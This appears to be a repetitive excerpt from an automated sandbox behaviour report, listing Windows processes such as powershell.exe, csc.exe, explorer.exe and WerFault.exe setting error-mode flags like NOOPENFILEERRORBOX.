Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
